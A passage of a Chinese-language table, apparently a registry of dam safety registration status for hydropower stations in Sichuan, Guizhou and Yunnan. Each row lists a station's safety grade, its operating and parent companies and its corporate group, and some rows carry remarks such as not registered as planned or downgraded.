地方企业 279 涪江古城 四川 注册 甲级 四川华能涪江水电有限责任公司 华能四川能源开发有限公司 中国华能 280 福堂 四川 注册 甲级 四川福堂水电有限公司 四川远通水电开发有限公司 地方企业 281 干溪坡 四川 注册 甲级 大唐雅安电力开发有限公司 大唐四川发电有限公司 中国大唐 282 高凤山 四川 注册 甲级 四川洪雅高奉山水力发电有限公司 四川川投电力开发有限责任公司 地方企业 283 葛达 四川 注册 乙级 雅江金通水电开发有限公司 成都市河源科技有限公司 地方企业 284 耿达 四川 注册 甲级 国网四川省电力公司映秀湾水力发电总厂 国网四川省电力公司 国家电网 285 龚嘴 四川 注册 甲级 国能大渡河流域水电开发有限公司龚嘴水力发电总厂 国能大渡河流域水电开发有限公司 国家能源集团 286 古瓦 四川 备案 / 大唐乡城水电开发有限公司 大唐四川发电有限公司 中国大唐 未按计划注册 287 古学 四川 注册 甲级 大唐得荣唐电水电开发有限公司 大唐四川发电有限公司 中国大唐 288 固滴 四川 注册 甲级 四川凉山水洛河电力开发有限公司 华电国际电力股份有限公司四川分公司 中国华电 289 固增 四川 备案 / 木里县固增水电开发有限责任公司 四川西昌电力股份有限公司 地方企业 290 关州 四川 备案 / 四川小金河水电开发有限责任公司 成都领越投资有限公司 地方企业 未按计划注册 291 官地 四川 注册 甲级 雅砻江流域水电开发有限公司官地水力发电厂 雅砻江流域水电开发有限公司 国投电力 292 官帽舟 四川 注册 乙级 四川马边雨田磷电有限公司 宜昌宏亿矿业有限公司 地方企业 连续乙级 293 龟都府 四川 注册 甲级 四川雅安龟都府电力有限责任公司 国家电投集团四川电力有限公司 国家电投 294 汉阳 四川 注册 乙级 青神金弘能源投资开发有限公司 成都金弘能源投资有限公司 地方企业 295 汗牛河 四川 注册 甲级 阿坝青衣江水电开发有限公司 四川永顺科技发展有限公司 地方企业 296 黑河塘 四川 注册 甲级 九寨沟水电开发有限责任公司 中国电建集团成都勘测设计研究院有限公司 中国电建 297 红卫桥 四川 备案 / 四川华电金川水电开发有限公司 华电四川发电有限公司 中国华电 298 红岩子 四川 注册 甲级 四川省南部红岩子电力有限责任公司 广西亚王水电股份有限公司 地方企业 299 红叶二级 四川 注册 甲级 四川华电杂谷脑水电开发有限责任公司 华电国际电力股份有限公司四川分公司 中国华电 300 洪坝 四川 注册 甲级 四川松林河流域开发有限公司 中电建水电开发集团有限公司 中国电建 301 猴子岩 四川 注册 甲级 国能大渡河猴子岩发电有限公司 国能大渡河流域水电开发有限公司 国家能源集团 302 华山沟 四川 注册 丙级 四川巴郎河水电开发有限公司 四川路桥建设集团股份有限公司 地方企业 303 黄金坪 四川 注册 甲级 四川大唐国际甘孜水电开发有限公司 大唐国际发电股份有限公司四川分公司 中国大唐 304 吉牛 四川 注册 甲级 国能大渡河革什扎水电开发有限公司 国能大渡河流域水电开发有限公司 国家能源集团 305 吉鱼 四川 注册 甲级 四川茂县宝山吉鱼水电开发有限公司 四川省彭州市宝山企业(集团)有限公司 地方企业 306 江边 四川 注册 甲级 中电四川(江边)发电有限公司 中电中国(江边)有限公司 地方企业 307 江口 四川 备案 / 四川江口水力发电有限公司 四川省宣汉县国有资产管理服务中心 地方企业 308 姜射坝 四川 注册 甲级 四川西部阳光电力开发有限公司 四川能投电力开发集团有限公司 地方企业 309 脚基坪 四川 注册 甲级 四川天全脚基坪水力发电有限公司 四川川投电力开发有限责任公司 地方企业 310 金康 四川 注册 甲级 四川金康电力发展有限公司 大唐国际发电股份有限公司四川分公司 中国大唐 311 金平 四川 注册 甲级 四川金康电力发展有限公司 大唐国际发电股份有限公司四川分公司 中国大唐 312 金沙 四川 备案 / 四川省能投攀枝花水电开发有限公司 四川能投电力开发集团有限公司 地方企业 未按计划注册 313 金溪 四川 注册 甲级 四川嘉陵江金溪航电开发有限公司 四川省港航开发集团有限责任公司 地方企业 314 金银台 四川 注册 甲级 四川港航嘉陵江金沙航电开发有限公司 四川省港航开发集团有限责任公司 地方企业 315 金元 四川 注册 甲级 四川金康电力发展有限公司 大唐国际发电股份有限公司四川分公司 中国大唐 316 锦屏二级 四川 注册 甲级 雅砻江流域水电开发有限公司锦屏水力发电厂 雅砻江流域水电开发有限公司 国投电力 317 锦屏一级 四川 注册 甲级 雅砻江流域水电开发有限公司锦屏水力发电厂 雅砻江流域水电开发有限公司 国投电力 318 九龙河沙坪 四川 注册 甲级 四川久隆水电开发有限公司 中国水利水电第七工程局有限公司 中国电建 319 久隆洪坝 四川 注册 甲级 四川久隆水电开发有限公司 中国水利水电第七工程局有限公司 中国电建 320 卡基娃 四川 注册 甲级 四川华电木里河水电开发有限公司 华电四川发电有限公司 中国华电 321 可河 四川 注册 甲级 会东县星光电力有限责任公司 国家电投集团四川电力有限公司 国家电投 322 拉拉山 四川 注册 甲级 四川华能巴塘水电有限公司 华能四川能源开发有限公司 中国华能 323 冷竹关 四川 注册 甲级 四川华能康定水电有限责任公司 华能四川能源开发有限公司 中国华能 324 立洲 四川 注册 甲级 四川华电木里河水电开发有限公司 华电四川发电有限公司 中国华电 325 联补 四川 注册 甲级 四川华电西溪河水电开发有限公司 华电四川发电有限公司 中国华电 326 两河口 四川 备案 / 雅砻江流域水电开发有限公司两河口水力发电厂 雅砻江流域水电开发有限公司 国投电力 327 柳洪 四川 注册 甲级 四川美姑河水电开发有限公司 中电建水电开发集团有限公司 中国电建 328 柳坪 四川 注册 甲级 阿坝水电开发有限公司 中电建水电开发集团有限公司 中国电建 329 龙洞 四川 注册 甲级 康定金源实业有限公司 四川利潮雨能源开发有限公司 地方企业 330 龙凤 四川 注册 甲级 四川省江油市龙凤水电有限公司 四川广安爱众股份有限公司 地方企业 331 龙头石 四川 注册 甲级 四川大渡河龙头石水力发电有限公司 中旭盛世风华投资有限公司 地方企业 332 泸定 四川 注册 甲级 四川华电泸定水电有限公司 华电国际电力股份有限公司四川分公司 中国华电 333 洛古 四川 注册 甲级 四川华电西溪河水电开发有限公司 华电四川发电有限公司 中国华电 334 毛尔盖 四川 注册 甲级 毛尔盖水电有限公司 四川远通水电开发有限公司 地方企业 335 毛滩 四川 注册 甲级 国家能源集团四川毛滩水电开发有限公司 国家能源集团四川发电有限公司 国家能源集团 336 民治 四川 注册 甲级 四川华能宝兴河水电有限责任公司 华能四川能源开发有限公司 中国华能 337 明台 四川 注册 甲级 华能明台电力有限责任公司 华能四川能源开发有限公司 中国华能 338 磨子 四川 备案 / 丹巴洁尔美水电开发有限公司 四川恒展投资有限公司 地方企业 未按计划注册 339 木里河沙湾 四川 注册 甲级 四川浙新能沙湾水力发电有限公司 浙江省新能源投资集团股份有限公司 浙能集团 340 木座 四川 注册 甲级 四川华能涪江水电有限责任公司 华能四川能源开发有限公司 中国华能 341 南桠河三级 四川 注册 甲级 国能四川电力股份有限公司南桠河发电厂 国家能源集团四川发电有限公司 国家能源集团 342 娘拥 四川 注册 甲级 大唐乡城水电开发有限公司 大唐四川发电有限公司 中国大唐 343 宁朗 四川 注册 甲级 四川凉山水洛河电力开发有限公司 华电国际电力股份有限公司四川分公司 中国华电 344 偏桥 四川 注册 甲级 四川久隆水电开发有限公司 中国水利水电第七工程局有限公司 中国电建 345 坪头 四川 注册 甲级 四川美姑河水电开发有限公司 中电建水电开发集团有限公司 中国电建 346 瀑布沟 四川 注册 甲级 国能大渡河瀑布沟发电有限公司 国能大渡河流域水电开发有限公司 国家能源集团 347 千佛岩 四川 注册 甲级 四川夹江千佛岩水力发电有限责任公司 四川远通水电开发有限公司 地方企业 348 硗碛 四川 注册 甲级 四川华能宝兴河水电有限责任公司 华能四川能源开发有限公司 中国华能 349 青居 四川 注册 甲级 四川华能嘉陵江水电有限责任公司 华能四川能源开发有限公司 中国华能 350 青龙 四川 注册 甲级 九寨沟水电开发有限责任公司 中国电建集团成都勘测设计研究院有限公司 中国电建 351 晴朗 四川 注册 甲级 四川兴鼎电力有限责任公司 国家电投集团四川电力有限公司 国家电投 352 去学 四川 注册 甲级 大唐香电得荣电力开发有限公司 广西桂冠电力股份有限公司 中国大唐 353 仁宗海 四川 注册 丙级 四川川投田湾河开发有限责任公司 四川川投能源股份有限公司 地方企业 354 撒多 四川 注册 甲级 四川凉山水洛河电力开发有限公司 华电国际电力股份有限公司四川分公司 中国华电 355 三棵树 四川 注册 甲级 四川安宁河能源开发有限责任公司 四川安宁河能源开发有限责任公司 地方企业 356 桑坪 四川 注册 甲级 四川西部阳光电力开发有限公司 四川能投电力开发集团有限公司 地方企业 357 色尔古 四川 注册 甲级 阿坝水电开发有限公司 中电建水电开发集团有限公司 中国电建 358 沙坪二级 四川 注册 甲级 国能大渡河沙坪发电有限公司 国能大渡河流域水电开发有限公司 国家能源集团 359 沙湾 四川 注册 甲级 四川圣达水电开发有限公司 中电建水电开发集团有限公司 中国电建 360 沙溪 四川 注册 甲级 四川港航嘉陵江金沙航电开发有限公司 四川省港航开发集团有限责任公司 地方企业 361 上通坝 四川 注册 甲级 四川华电木里河水电开发有限公司 华电四川发电有限公司 中国华电 362 深溪沟 四川 注册 甲级 国能大渡河深溪沟发电有限公司 国能大渡河流域水电开发有限公司 国家能源集团 363 胜利 四川 注册 乙级 天全胜利电力有限责任公司 雅安胜利电力有限责任公司 地方企业 364 狮子坪 四川 备案 / 四川华电杂谷脑水电开发有限责任公司 华电国际电力股份有限公司四川分公司 中国华电 未按计划注册 365 双河(南坪) 四川 注册 甲级 九寨沟水电开发有限责任公司 中国电建集团成都勘测设计研究院有限公司 中国电建 366 水津关 四川 注册 甲级 华电四川发电有限公司雅安分公司 华电四川发电有限公司 中国华电 367 水牛家 四川 注册 甲级 四川华能涪江水电有限责任公司 华能四川能源开发有限公司 中国华能 368 苏洼龙 四川 备案 / 华电金沙江上游水电开发有限公司苏洼龙分公司 华电金沙江上游水电开发有限公司 中国华电 369 踏卡 四川 注册 甲级 四川久隆水电开发有限公司 中国水利水电第七工程局有限公司 中国电建 370 太平驿 四川 注册 甲级 四川华能太平驿水电有限责任公司 华能四川能源开发有限公司 中国华能 371 桐子壕 四川 注册 甲级 四川嘉陵江桐子壕航电开发有限公司 四川省港航开发集团有限责任公司 地方企业 372 桐子林 四川 注册 甲级 雅砻江流域水电开发有限公司二滩水力发电厂 雅砻江流域水电开发有限公司 国投电力 373 铜街子 四川 注册 甲级 国能大渡河流域水电开发有限公司龚嘴水力发电总厂 国能大渡河流域水电开发有限公司 国家能源集团 374 铜头 四川 注册 甲级 四川华能宝兴河水电有限责任公司 华能四川能源开发有限公司 中国华能 375 铜钟 四川 注册 甲级 国网四川岷江供电有限责任公司发电分公司 国网四川岷江供电有限责任公司 国家电网 376 瓦屋山 四川 注册 甲级 华电四川发电有限公司瓦屋山分公司 华电四川发电有限公司 中国华电 377 湾坝 四川 注册 甲级 四川松林河流域开发有限公司 中电建水电开发集团有限公司 中国电建 378 湾东 四川 备案 / 泸定县昌源电力开发有限公司 水发安和集团有限公司 地方企业 未按计划注册 379 湾二 四川 注册 甲级 四川久隆水电开发有限公司 中国水利水电第七工程局有限公司 中国电建 380 卧罗桥 四川 注册 乙级 盐源县卧罗河电力有限责任公司 深能水电投资管理有限公司 地方企业 381 五一桥 四川 注册 甲级 四川中铁能源五一桥水电有限公司 中电建水电开发集团有限公司 中国电建 382 溪古 四川 注册 甲级 四川久隆水电开发有限公司 中国水利水电第七工程局有限公司 中国电建 383 溪洛渡 四川 注册 甲级 中国长江电力股份有限公司溪洛渡水力发电厂 中国长江电力股份有限公司 中国三峡集团 384 仙女堡 四川 注册 甲级 四川川汇水电投资有限责任公司 广西桂冠电力股份有限公司 中国大唐 385 乡城 四川 注册 甲级 大唐乡城唐电水电开发有限公司 大唐四川发电有限公司 中国大唐 386 向家坝 四川 注册 甲级 中国长江电力股份有限公司向家坝水力发电厂 中国长江电力股份有限公司 中国三峡集团 387 小沟头 四川 注册 乙级 四川省宝兴县兴源实业有限责任公司 四川省宝兴县兴源实业有限责任公司 地方企业 388 小关子 四川 注册 甲级 四川华能宝兴河水电有限责任公司 华能四川能源开发有限公司 中国华能 389 小河 四川 注册 乙级 四川华人电力有限公司 易上集团有限公司 地方企业 390 小龙门 四川 注册 甲级 四川嘉陵江小龙门航电开发有限公司 四川省港航开发集团有限责任公司 地方企业 391 小天都 四川 注册 甲级 四川华能康定水电有限责任公司 华能四川能源开发有限公司 中国华能 392 斜卡 四川 注册 甲级 四川久隆水电开发有限公司 中国水利水电第七工程局有限公司 中国电建 393 新藏 四川 备案 / 四川凉山水洛河电力开发有限公司 华电国际电力股份有限公司四川分公司 中国华电 394 新马 四川 注册 甲级 德昌县新马水电开发有限责任公司 四川鸿昌电力有限责任公司 地方企业 395 新政 四川 注册 甲级 四川嘉陵江新政航电开发有限公司 四川省港航开发集团有限责任公司 地方企业 396 薛城 四川 注册 甲级 四川华电杂谷脑水电开发有限责任公司 华电国际电力股份有限公司四川分公司 中国华电 397 烟岗 四川 注册 甲级 四川华润鸭嘴河水电开发有限公司 华润电力控股有限公司四川公司 华润电力 398 杨村 四川 注册 甲级 四川大渡河电力股份有限公司 峨边彝族自治县财政局 地方企业 399 杨房沟 四川 备案 / 雅砻江流域水电开发有限公司杨房沟水力发电厂 雅砻江流域水电开发有限公司 国投电力 400 杨家湾 四川 注册 甲级 四川小金川水电开发有限公司 中电建水电开发集团有限公司 中国电建 401 姚河坝 四川 注册 甲级 国家能源集团四川发电有限公司南桠河水电分公司 国家能源集团四川发电有限公司 国家能源集团 402 冶勒 四川 注册 甲级 国家能源集团四川发电有限公司南桠河水电分公司 国家能源集团四川发电有限公司 国家能源集团 403 阴坪 四川 注册 甲级 四川华能涪江水电有限责任公司 华能四川能源开发有限公司 中国华能 404 英雄坡二级 四川 备案 / 四川省普格永裕水电开发有限责任公司 四川省普格永裕水电开发有限责任公司 地方企业 未按计划注册 405 映秀湾 四川 注册 甲级 国网四川省电力公司映秀湾水力发电总厂 国网四川省电力公司 国家电网 406 渔子溪 四川 注册 甲级 国网四川省电力公司映秀湾水力发电总厂 国网四川省电力公司 国家电网 407 雨城 四川 注册 甲级 四川华能宝兴河水电有限责任公司 华能四川能源开发有限公司 中国华能 408 玉林桥 四川 注册 甲级 四川明达集团峨边电能开发有限责任公司 四川明达集团实业有限公司 地方企业 409 玉田 四川 注册 甲级 四川玉田能源发展有限公司 四川川投电力开发有限责任公司 地方企业 410 杂谷脑古城 四川 注册 甲级 四川华电杂谷脑水电开发有限责任公司 华电国际电力股份有限公司四川分公司 中国华电 411 张窝 四川 注册 甲级 四川宜宾伊力集团横江发电有限公司 四川宜宾伊力集团横江发电有限公司 地方企业 412 昭化 四川 注册 甲级 大唐四川川北电力开发有限公司 大唐四川发电有限公司 中国大唐 413 枕头坝一级 四川 注册 甲级 国能大渡河枕头坝发电有限公司 国能大渡河流域水电开发有限公司 国家能源集团 414 舟坝 四川 注册 甲级 四川海能电业有限公司 海能实业集团有限公司 地方企业 415 周公河沙坪 四川 注册 甲级 华电四川发电有限公司雅安分公司 华电四川发电有限公司 中国华电 416 竹格多 四川 注册 甲级 黑水冰川水电开发有限责任公司 中昊西部铝工业控股有限公司 地方企业 417 紫兰坝 四川 注册 甲级 四川紫兰坝水电开发有限责任公司 华电四川发电有限公司 中国华电 418 自一里 四川 注册 甲级 四川华能涪江水电有限责任公司 华能四川能源开发有限公司 中国华能 419 白市 贵州 注册 甲级 贵州清水江水电有限公司白市水电厂 五凌电力有限公司 国家电投 420 百花 贵州 注册 甲级 国家能源集团贵州电力有限公司红枫水力发电厂 国家能源集团贵州电力有限公司 国家能源集团 421 大花水 贵州 注册 甲级 贵州乌江清水河水电开发有限公司 贵州乌江水电开发有限责任公司 中国华电 422 大田河落生 贵州 注册 甲级 贵州大田河水电开发有限公司 广西桂冠电力股份有限公司 中国大唐 423 东风 贵州 注册 甲级 贵州乌江水电开发有限责任公司东风发电厂 贵州乌江水电开发有限责任公司 中国华电 424 董箐 贵州 注册 甲级 贵州北盘江电力股份有限公司董箐分公司 贵州黔源电力股份有限公司 中国华电 425 高生 贵州 注册 甲级 贵州中水能源股份有限公司遵义分公司 贵州中水能源股份有限公司 国家电投 426 格里桥 贵州 注册 甲级 贵州乌江清水河水电开发有限公司 贵州乌江水电开发有限责任公司 中国华电 427 构皮滩 贵州 注册 甲级 贵州乌江水电开发有限责任公司构皮滩发电厂 贵州乌江水电开发有限责任公司 中国华电 428 挂治 贵州 注册 甲级 贵州清水江水电有限公司挂治水力发电厂 五凌电力有限公司 国家电投 429 官庄 贵州 注册 乙级 中国水电顾问集团道真开发有限公司 中国电建集团贵阳勘测计研究院有限公司 中国电建 430 光照 贵州 注册 甲级 贵州北盘江电力股份有限公司光照分公司 贵州黔源电力股份有限公司 中国华电 431 红枫 贵州 注册 甲级 国家能源集团贵州电力有限公司红枫水力发电厂 国家能源集团贵州电力有限公司 国家能源集团 432 红林 贵州 注册 甲级 国家能源集团贵州电力有限公司红枫水力发电厂 国家能源集团贵州电力有限公司 国家能源集团 433 红岩 贵州 注册 甲级 国家能源集团贵州电力有限公司红枫水力发电厂 国家能源集团贵州电力有限公司 国家能源集团 434 洪家渡 贵州 注册 甲级 贵州乌江水电开发有限责任公司洪家渡发电厂 贵州乌江水电开发有限责任公司 中国华电 435 黄花寨 贵州 注册 甲级 大唐贵州黄花寨水电开发有限公司 大唐贵州发电有限公司 中国大唐 436 灰洞 贵州 注册 甲级 贵州蒙江流域开发有限公司 贵州中水能源股份有限公司 国家电投 437 角木塘 贵州 注册 甲级 贵州大唐国际道真水电开发有限公司 中国大唐集团有限公司重庆分公司 中国大唐 438 老江底 贵州 注册 甲级 兴义黄泥河发电有限责任公司 兴义市电力有限责任公司 地方企业 439 马马崖一级 贵州 注册 甲级 贵州北盘江电力股份有限公司马马崖分公司 贵州黔源电力股份有限公司 中国华电 440 毛家河 贵州 注册 甲级 贵州中水能源股份有限公司中源分公司 贵州中水能源股份有限公司 国家电投 441 泥猪河 贵州 注册 乙级 水城汇通水电开发有限责任公司 上海汇通水利水电开发有限责任公司 地方企业 连续乙级 442 普定 贵州 注册 甲级 贵州黔源电力股份有限公司普定发电公司 贵州黔源电力股份有限公司 中国华电 443 冗各 贵州 注册 甲级 贵州蒙江流域开发有限公司 贵州中水能源股份有限公司 国家电投 444 三板溪 贵州 注册 甲级 贵州清水江水电有限公司三板溪水电厂 五凌电力有限公司 国家电投 445 沙阡 贵州 注册 甲级 中国水电顾问集团正安开发有限公司 中国水电工程顾问集团南方分公司 中国电建 446 沙沱 贵州 注册 甲级 贵州乌江水电开发有限责任公司沙沱发电厂 贵州乌江水电开发有限责任公司 中国华电 447 善泥坡 贵州 注册 甲级 贵州西源发电有限责任公司 贵州黔源电力股份有限公司 中国华电 448 上尖坡 贵州 注册 甲级 贵州蒙江流域开发有限公司 贵州中水能源股份有限公司 国家电投 449 石垭子 贵州 注册 甲级 贵州中水能源股份有限公司遵义分公司 贵州中水能源股份有限公司 国家电投 450 双河口 贵州 注册 甲级 贵州蒙江流域开发有限公司 贵州中水能源股份有限公司 国家电投 451 思林 贵州 注册 甲级 贵州乌江水电开发有限责任公司思林发电厂 贵州乌江水电开发有限责任公司 中国华电 452 索风营 贵州 注册 甲级 贵州乌江水电开发有限责任公司索风营发电厂 贵州乌江水电开发有限责任公司 中国华电 453 天生桥二级 贵州 注册 甲级 天生桥二级水力发电有限公司 南方电网储能股份有限公司 南方电网 454 天生桥一级 贵州 注册 甲级 天生桥一级水电开发有限责任公司水力发电厂 广东省能源集团有限公司水电分公司 广东能源集团 455 团坡 贵州 注册 甲级 贵州蒙江流域开发有限公司 贵州中水能源股份有限公司 国家电投 456 乌江渡 贵州 注册 甲级 贵州乌江水电开发有限责任公司乌江渡发电厂 贵州乌江水电开发有限责任公司 中国华电 457 响水 贵州 注册 甲级 六盘水北盘江水电开发有限公司 珠江水利水电开发有限公司 地方企业 458 象鼻岭 贵州 注册 甲级 国家电投贵州金元威宁能源股份有限公司象鼻岭水电站 国家电投贵州金元威宁能源股份有限公司 国家电投 459 修文 贵州 注册 甲级 国家能源集团贵州电力有限公司红枫水力发电厂 国家能源集团贵州电力有限公司 国家能源集团 460 引子渡 贵州 注册 甲级 贵州黔源电力股份有限公司引子渡发电厂 贵州黔源电力股份有限公司 中国华电 461 鱼塘 贵州 注册 甲级 贵州北源电力股份有限公司道真鱼塘分公司 贵州黔源电力股份有限公司 中国华电 462 窄巷口 贵州 注册 甲级 国家能源集团贵州电力有限公司红枫水力发电厂 国家能源集团贵州电力有限公司 国家能源集团 463 阿海 云南 注册 甲级 云南华电金沙江中游水电开发有限公司阿海发电分公司 云南华电金沙江中游水电开发有限公司 中国华电 464 阿鸠田 云南 注册 乙级 云南保山苏帕河水电开发有限公司 云南省电力投资有限公司 地方企业 降级 465 阿墨江三江口 云南 注册 甲级 国家能源集团云南电力有限公司普洱分公司 国家能源集团云南电力有限公司 国家能源集团 466 白鹤滩 云南 备案 / 三峡金沙江云川水电开发有限公司宁南白鹤滩电厂 三峡金沙江云川水电开发有限公司 中国三峡集团 467 柏香林 云南 注册 甲级 云南昭通高桥发电有限公司 云南恒安电力工程有限公司 南方电网 468 冲江河(二期) 云南 注册 甲级 国能迪庆香格里拉发电有限公司 国家能源集团云南电力有限公司 国家能源集团 469 达开 云南 注册 甲级 宣威市革香河水电开发有限公司 曲靖晋源实业有限公司 地方企业 470 大朝山 云南 注册 甲级 国投云南大朝山水电有限公司 国投电力控股股份有限公司 国投电力 471 大华桥 云南 注册 甲级 华能澜沧江水电股份有限公司黄登大华桥水电厂 华能澜沧江水电股份有限公司 中国华能 472 大勐统 云南 注册 甲级 云南省永德恒昌电力有限公司 云南能投中小水电投资有限公司 地方企业 473 大丫口 云南 注册 甲级 临沧粤电能源有限公司 广东省能源集团有限公司水电分公司 广东能源集团 474 大岩洞 云南 注册 甲级 会泽县川渝水电开发有限公司 重庆龙珠电力股份有限公司 地方企业 475 大盈江二级 云南 注册 甲级 德宏宏晟大盈江二级电站开发有限公司 云南华昆投资有限公司 地方企业 476 大盈江三级 云南 注册 甲级 德宏凯瑞大盈江水电开发有限公司 云南凯瑞科工贸有限公司 地方企业 477 大盈江四级 云南 注册 甲级 盈江县多源水电开发有限公司 桓仁普乐矿业有限公司 地方企业 478 大盈江一级 云南 注册 甲级 国能德宏发电有限公司 国家能源集团云南电力有限公司 国家能源集团 479 大寨 云南 注册 甲级 国家能源集团云南电力有限公司大寨分公司 国家能源集团云南电力有限公司 国家能源集团 480 丹珠河 云南 注册 乙级 贡山县恒远水电开发有限公司 安徽水利开发有限公司 地方企业 降级 481 等壳 云南 注册 乙级 保山能源发展股份有限公司等壳电厂 保山能源发展股份有限公司 地方企业 482 堵堵洛河二级 云南 注册 乙级 泸水市泉德水电开发有限责任公司 深能水电投资管理有限公司 地方企业 483 凤凰谷 云南 注册 甲级 云南南盘江凤凰谷水电开发有限公司 中国电建集团昆明勘测设计研究院有限公司 中国电建 484 岗曲河一级 云南 注册 甲级 大唐迪庆香格里拉电力开发有限公司 中国大唐集团公司广西分公司 中国大唐 485 高桥 云南 注册 甲级 云南昭通高桥发电有限公司 云南恒安电力工程有限公司 南方电网 486 戈兰滩 云南 注册 甲级 云南大唐国际李仙江流域水电开发有限公司 大唐云南发电有限公司 中国大唐 487 功果桥 云南 注册 甲级 华能澜沧江水电股份有限公司苗尾·功果桥水电厂 华能澜沧江水电股份有限公司 中国华能 488 观音岩 云南 注册 甲级 大唐观音岩水电开发有限公司 大唐云南发电有限公司 中国大唐 489 黄登 云南 注册 甲级 华能澜沧江水电股份有限公司黄登大华桥水电厂 华能澜沧江水电股份有限公司 中国华能 490 黄角树 云南 注册 乙级 云南昊龙实业集团黄角树水电开发有限公司 云南昊龙实业集团有限公司 地方企业 491 吉沙 云南 注册 甲级 国能迪庆香格里拉发电有限公司 国家能源集团云南电力有限公司 国家能源集团 492 甲岩 云南 注册 甲级 云南滇能禄劝电磷开发有限公司 国家电投集团云南国际电力投资有限公司 国家电投 493 金安桥 云南 注册 甲级 金安桥水电站有限公司 金江水力发电集团有限公司 地方企业 494 金汉拉扎 云南 注册 甲级 香格里拉市正烨水电开发有限公司 西藏正烨水电开发股份有限公司 地方企业 495 景洪 云南 注册 甲级 华能澜沧江水电股份有限公司景洪水电厂 华能澜沧江水电股份有限公司 中国华能 496 居甫渡 云南 注册 甲级 云南大唐国际李仙江流域水电开发有限公司 大唐云南发电有限公司 中国大唐 497 克田 云南 注册 甲级 禄劝临亚水电开发有限公司 深能水电投资管理有限公司 地方企业 498 拉气 云南 注册 乙级 马关拉气发电有限责任公司 中国三峡新能源(集团)股份有限公司 中国三峡集团 连续乙级 499 腊寨 云南 注册 甲级 云南龙陵腊寨水电发展有限公司 中国三峡新能源(集团)股份有限公司 中国三峡集团 500 雷打滩 云南 注册 甲级 云南省弥勒雷打滩水电有限责任公司 江阴澄星磷化工股份有限公司 地方企业 501 梨园 云南 注册 甲级 云南华电金沙江中游水电开发有限公司梨园发电分公司 云南华电金沙江中游水电开发有限公司 中国华电 502 里底 云南 注册 甲级 华能澜沧江水电股份有限公司乌弄龙里底水电厂 华能澜沧江水电股份有限公司 中国华能 503 六郎洞 云南 注册 甲级 国家能源集团云南电力有限公司六郎洞分公司 国家能源集团云南电力有限公司 国家能源集团 504 龙开口 云南 注册 甲级 华能龙开口水电有限公司 华能澜沧江水电股份有限公司 中国华能 505 龙马 云南 注册 甲级 云南大唐国际李仙江流域水电开发有限公司 大唐云南发电有限公司 中国大唐 506 鲁布革 云南 注册 甲级 南方电网调峰调频发电有限公司鲁布革水力发电厂 南方电网储能股份有限公司 南方电网 507 鲁地拉 云南 注册 甲级 云南华电鲁地拉水电有限公司 华电云南发电有限公司 中国华电 508 鲁基厂 云南 注册 甲级 云南滇能禄劝电磷开发有限公司 国家电投集团云南国际电力投资有限公司 国家电投 509 绿水河 云南 注册 甲级 华电云南发电有限公司绿水河发电厂 华电云南发电有限公司 中国华电 510 罗闸河二级 云南 注册 甲级 临沧新华水利水电开发有限公司 云南新华水利水电投资有限公司 中核集团 511 螺丝湾 云南 注册 甲级 国能迪庆香格里拉发电有限公司 国家能源集团云南电力有限公司 国家能源集团 512 倮马 云南 注册 甲级 云南江海投资开发有限公司 伟星集团有限公司 地方企业 513 马堵山 云南 注册 甲级 红河广源马堵山水电开发有限公司 广东水电云南投资有限公司 地方企业 514 马鹿塘二期 云南 注册 甲级 云南大唐国际文山水电开发有限公司 大唐云南发电有限公司 中国大唐 515 漫湾 云南 注册 甲级 华能澜沧江水电股份有限公司漫湾水电厂 华能澜沧江水电股份有限公司 中国华能 516 勐野江 云南 备案 / 云南大唐国际李仙江流域水电开发有限公司 大唐云南发电有限公司 中国大唐 未按计划注册 517 苗尾 云南 注册 甲级 华能澜沧江水电股份有限公司苗尾·功果桥水电厂 华能澜沧江水电股份有限公司 中国华能 518 庙林 云南 注册 甲级 彝良滇能洛泽河流域发电有限公司 国家电投集团云南国际电力投资有限公司 国家电投 519 木加甲一级 云南 注册 甲级 福贡丰源水电发展有限公司 云南美亚民瑞电力投资有限公司 地方企业 520 木星土 云南 注册 甲级 香格里拉市正烨水电开发有限公司 西藏正烨水电开发股份有限公司 地方企业 521 那邦 云南 注册 甲级 盈江华富水电开发有限公司 北京京能清洁能源西南分公司 京能集团 522 那兰 云南 注册 甲级 云南大唐国际那兰水电开发有限公司 大唐云南发电有限公司 中国大唐 523 南极洛河 云南 注册 甲级 云南江海投资开发有限公司南极洛河水电站 云南江海投资开发有限公司 地方企业 524 南沙 云南 注册 甲级 红河广源水电开发有限公司 广东水电云南投资有限公司 地方企业 525 弄另 云南 注册 甲级 德宏州龙江水电开发有限公司 浙江大华集团 地方企业 526 糯扎渡 云南 注册 甲级 华能澜沧江水电股份有限公司糯扎渡水电厂 华能澜沧江水电股份有限公司 中国华能 527 糯租 云南 注册 甲级 云南南盘江糯租水电开发有限公司 中国电建集团昆明勘测设计研究院有限公司 中国电建 528 平地哨 云南 注册 乙级 华电云南发电有限公司石龙坝发电厂 华电云南发电有限公司 中国华电 529 普西桥 云南 注册 甲级 国能普洱发电有限公司 国家能源集团云南电力有限公司 国家能源集团 530 铅厂 云南 注册 甲级 云南滇能禄劝电磷开发有限公司 国家电投集团云南国际电力投资有限公司 国家电投 531 撒鱼沱 云南 注册 甲级 四川宜宾伊力集团横江发电有限公司 四川宜宾伊力集团横江发电有限公司 地方企业 532 赛珠 云南 注册 甲级 云南滇能禄劝电磷开发有限公司 国家电投集团云南国际电力投资有限公司 国家电投 533 三岔河 云南 注册 甲级 云南保山槟榔江水电开发有限公司 保山能源发展股份有限公司 地方企业 534 石门坎 云南 注册 甲级 云南大唐国际李仙江流域水电开发有限公司 大唐云南发电有限公司 中国大唐 535 泗南江 云南 注册 甲级 云南滇能泗南江水电开发有限公司 国家电投集团云南国际电力投资有限公司 国家电投 536 松山河口 云南 注册 甲级 云南保山槟榔江水电开发有限公司 保山能源发展股份有限公司 地方企业 537 苏家河口 云南 注册 甲级 云南保山槟榔江水电开发有限公司 保山能源发展股份有限公司 地方企业 538 腾龙桥二级 云南 注册 甲级 腾冲苏电龙川江水电开发有限公司 云南省电力投资有限公司 地方企业 539 腾龙桥一级 云南 注册 甲级 保山龙川江水电开发有限公司 保山能源发展股份有限公司 地方企业 540 天花板 云南 注册 甲级 云南滇能智慧能源有限公司鲁甸牛栏江分公司 国家电投集团云南国际电力投资有限公司 国家电投 541 土卡河 云南 注册 甲级 云南大唐国际李仙江流域水电开发有限公司 大唐云南发电有限公司 中国大唐 542 万家口子 云南 注册 甲级 大唐宣威水电开发有限公司 大唐云南发电有限公司 中国大唐 543 万年桥 云南 注册 乙级 四川宜宾伊力集团横江发电有限公司 四川宜宾伊力集团横江发电有限公司 地方企业 544 威远江 云南 注册 